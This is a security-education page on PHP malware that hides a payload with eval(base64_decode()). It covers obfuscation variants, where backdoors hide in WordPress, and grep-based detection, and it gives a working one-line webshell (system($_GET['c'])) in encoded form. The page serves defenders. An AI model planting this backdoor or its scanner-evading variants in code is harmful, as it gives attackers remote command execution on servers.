PHP eval(base64_decode()) Malware Patterns
The `eval(base64_decode('...'))` pattern is the signature of PHP malware. It hides a webshell, backdoor, or spam injector inside an innocuous-looking Base64 string, then executes it with eval(). You'll find it injected into WordPress themes, uploaded as fake plugins, or appended to legitimate PHP files during a server compromise.
Try it now
Encoder / Decoder
Runs in your browser, nothing leaves your device.
The simplest form is `eval(base64_decode('encoded_payload'))`. More advanced variants chain encoding: `eval(gzinflate(base64_decode('...')))` adds gzip compression, `eval(str_rot13(base64_decode('...')))` adds character rotation. Some use `assert()` instead of `eval()` or call `create_function()` to avoid keyword-based scanning. Variable-based obfuscation like `$f='base'.'64_decode'; eval($f('...'))` bypasses simple grep searches.
Check recently modified PHP files, especially in wp-content/themes, wp-content/plugins, and wp-includes. Malware often hides in functions.php, wp-config.php, or index.php. Look for files with unusual modification timestamps, files much larger than expected, and PHP files in upload directories where only images should exist.
Examples
Simple PHP backdoor
eval(base64_decode('c3lzdGVtKCRfR0VUWydjJ10pOw=='));
system($_GET['c']); // Remote command execution
Chained encoding
eval(gzinflate(base64_decode('...')));
Decode base64 first, then decompress gzip to get the PHP code
Security context
If you find eval(base64_decode()) in a PHP file, assume the server is compromised. Decode the payload to understand what the attacker can do, then check access logs for exploitation evidence. The encoded content is usually a webshell that gives the attacker full server access.
Frequently asked
Search for eval(base64_decode, eval(gzinflate, assert(base64_decode, and create_function in all PHP files. Use: grep -r 'eval(base64_decode' /var/www/html/. Also check for files modified recently that shouldn't have been, and PHP files in upload directories.
Not always, but it's a major red flag. Some template engines and legacy code use eval() legitimately, but modern PHP frameworks avoid it entirely. eval(base64_decode()) specifically is almost always malware, as there is no legitimate reason to execute encoded PHP at runtime.
Go deeper
Continue in the Web Security Academy
Related techniques
Base64 Decoding
How to decode Base64-encoded payloads found in malware, phishing kits, and obfuscated scripts. Detect hidden URLs, credentials, and executable code.
JavaScript Deobfuscation Techniques
How to deobfuscate JavaScript malware, phishing scripts, and browser exploits. Reverse eval packing, string rotation, array shuffling, and control flow flattening.
Shannon Entropy
Use Shannon entropy to identify encrypted files, compressed data, obfuscated code, and packed malware. High entropy means hidden content.